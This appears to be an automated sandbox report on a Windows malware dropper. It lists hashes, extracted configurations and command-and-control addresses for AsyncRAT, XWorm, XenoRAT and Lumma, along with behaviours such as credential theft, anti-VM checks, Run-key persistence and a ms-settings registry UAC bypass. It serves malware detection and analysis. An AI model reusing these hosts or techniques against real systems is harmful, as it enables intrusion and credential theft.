asyncrat | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
283s
max time network
302s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-11-2024 23:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score

10^/10

asyncrat lumma xenorat xworm default credential_access defense_evasion discovery evasion execution persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Family

xenorat

beastsband.com

Mutex

x3n0

Attributes

delay
5000
install_path
nothingset
port
4444
startup_name
nothingset

Extracted

Family

xworm

Version

5.0

68.178.207.33:7000

Mutex

sSM7p4MT4JctLnRS

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

127.0.0.1:4449

135.181.185.254:4449

212.15.49.155:4449

Mutex

fssssssshsfhs444fdf%dfs

Attributes

delay
11
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

xworm

Version

3.1

18.181.154.24:7000

Mutex

w8DsMRIhXrOmk0Gn

Attributes

Install_directory
%AppData%
install_file
USB.exe

aes.plain

Extracted

Family

lumma

https://push-hook.cyou/api

https://blade-govern.sbs/api

https://story-tense-faz.sbs/api

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect XenoRat Payload 2 IoCs

resource	yara_rule
behavioral2/memory/2108-116-0x0000000007D70000-0x0000000007E6A000-memory.dmp	family_xenorat
behavioral2/memory/2108-165-0x0000000008550000-0x000000000855C000-memory.dmp	family_xenorat

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral2/files/0x000b000000023cd6-214.dat	family_xworm
behavioral2/memory/4056-222-0x0000000000A00000-0x0000000000A0E000-memory.dmp	family_xworm
behavioral2/memory/6372-2730-0x0000000000400000-0x0000000000410000-memory.dmp	family_xworm

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 6976 created 2964	6976	AddInProcess32.exe	49
PID 4524 created 3412	4524	Reynolds.com	56
PID 316 created 2964	316	rh.exe	49

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
Xenorat family
xenorat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	UqhRb9F.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rh.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1356	powershell.exe
2588	powershell.exe
548	powershell.exe
6888	powershell.exe
2620	powershell.exe
2740	powershell.exe
7148	powershell.exe

Downloads MZ/PE file

Uses browser remote debugging 2 TTPs 9 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
6108	msedge.exe
5924	msedge.exe
3588	chrome.exe
5352	msedge.exe
5296	chrome.exe
2568	msedge.exe
544	msedge.exe
5140	chrome.exe
5132	chrome.exe

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	UqhRb9F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	UqhRb9F.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rh.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	New Text Document mod.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	VBVEd6f.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	0fVlNye.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	IMG001.exe

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url	cmd.exe
File opened for modification	\??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\zeuschat.url	taskmgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZeusChat.url	cmd.exe

Executes dropped EXE 53 IoCs

pid	Process
2108	UqhRb9F.exe
968	fHR9z2C.exe
4232	filer.exe
3692	AmLzNi.exe
2872	Xworm%20V5.6.exe
4056	XClient.exe
676	333.exe
2176	VBVEd6f.exe
3716	test12.exe
1340	test6.exe
4356	test14.exe
3644	pantest.exe
1740	test9.exe
5324	test10-29.exe
5692	test19.exe
5784	test10.exe
6044	test_again4.exe
5280	test23.exe
5544	test5.exe
5768	test11.exe
6016	test20.exe
5676	test_again3.exe
3668	test16.exe
3960	test13.exe
1484	test_again2.exe
6164	test15.exe
6296	test18.exe
6388	test21.exe
6476	test22.exe
6636	test8.exe
6740	test7.exe
6868	test-again.exe
7000	test17.exe
7072	vg9qcBa.exe
5296	vg9qcBa.exe
6536	win.exe
3368	cbchr.exe
2636	FaceBuild.exe
684	InstaIIer.exe
6616	TikTokDesktop18.exe
5700	TikTok18.exe
6116	x4lburt.exe
5588	computerlead.exe
6724	installer.exe
3868	9758xBqgE1azKnB.exe
7008	7mpPLxE.exe
2400	7mpPLxE.exe
5260	0fVlNye.exe
4524	Reynolds.com
3288	IMG001.exe
316	rh.exe
7036	steamerx.exe
5364	justpoc.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	UqhRb9F.exe
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Wine	rh.exe

Loads dropped DLL 2 IoCs

pid	Process
3368	cbchr.exe
6616	TikTokDesktop18.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	x4lburt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Administrator = "C:\\ProgramData\\Microsoft\\csrss.exe"	win.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	TikTok18.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
45	raw.githubusercontent.com
209	bitbucket.org
210	bitbucket.org
579	raw.githubusercontent.com
43	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
41	ip-api.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
3604	arp.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000023cc3-87.dat	autoit_exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs	svchost.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
6720	tasklist.exe
3536	tasklist.exe
180	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2108	UqhRb9F.exe
316	rh.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 7072 set thread context of 5296	7072	vg9qcBa.exe	241
PID 3368 set thread context of 5640	3368	cbchr.exe	255
PID 6616 set thread context of 4932	6616	TikTokDesktop18.exe	276
PID 6724 set thread context of 2808	6724	installer.exe	281
PID 5588 set thread context of 6976	5588	computerlead.exe	287
PID 7008 set thread context of 2400	7008	7mpPLxE.exe	305

Drops file in Windows directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\DownReceptor	0fVlNye.exe
File opened for modification	C:\Windows\ComfortSick	0fVlNye.exe
File opened for modification	C:\Windows\IdeasApp	0fVlNye.exe
File opened for modification	C:\Windows\KeyboardsTwin	0fVlNye.exe
File opened for modification	C:\Windows\TeddySecretariat	0fVlNye.exe
File opened for modification	C:\Windows\OrganDiscretion	0fVlNye.exe
File opened for modification	C:\Windows\VatBukkake	0fVlNye.exe
File opened for modification	C:\Windows\CentralAvoiding	0fVlNye.exe
File opened for modification	C:\Windows\JoiningMazda	0fVlNye.exe
File opened for modification	C:\Windows\UruguayNorthern	0fVlNye.exe
File opened for modification	C:\Windows\MozambiqueAppropriate	0fVlNye.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Embeds OpenSSL 1 IoCs

Embeds OpenSSL, may be used to circumvent TLS interception.

resource	yara_rule
behavioral2/files/0x0007000000023e07-2643.dat	embeds_openssl

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 7 IoCs

pid	pid_target	Process	procid_target
1852	5296	WerFault.exe	241
6396	5296	WerFault.exe	241
5580	3368	WerFault.exe	253
6248	2808	WerFault.exe	281
1196	6976	WerFault.exe	287
6000	2400	WerFault.exe	305
6428	316	WerFault.exe	350

System Location Discovery: System Language Discovery 1 TTPs 47 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FaceBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	route.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	arp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TikTokDesktop18.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7mpPLxE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0fVlNye.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IMG001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	steamerx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vg9qcBa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7mpPLxE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VBVEd6f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	win.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	vg9qcBa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cbchr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	justpoc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dxdiag.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wmic.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	UqhRb9F.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	333.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	computerlead.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9758xBqgE1azKnB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0009000000023cfb-625.dat	nsis_installer_2
behavioral2/files/0x0003000000022ed4-2555.dat	nsis_installer_1
behavioral2/files/0x0003000000022ed4-2555.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 17 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	VBVEd6f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	VBVEd6f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6876	timeout.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4320	wmic.exe
3628	wmic.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	42	Go-http-client/1.1

Kills process with taskkill 2 IoCs

evasion

pid	Process
864	taskkill.exe
5992	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133771368393236145"	chrome.exe

Modifies registry class 36 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	OpenWith.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\7910.vbs"	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\8053.vbs"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	mspaint.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute	reg.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\4582.vbs"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\ms-settings\Shell\Open\command	reg.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
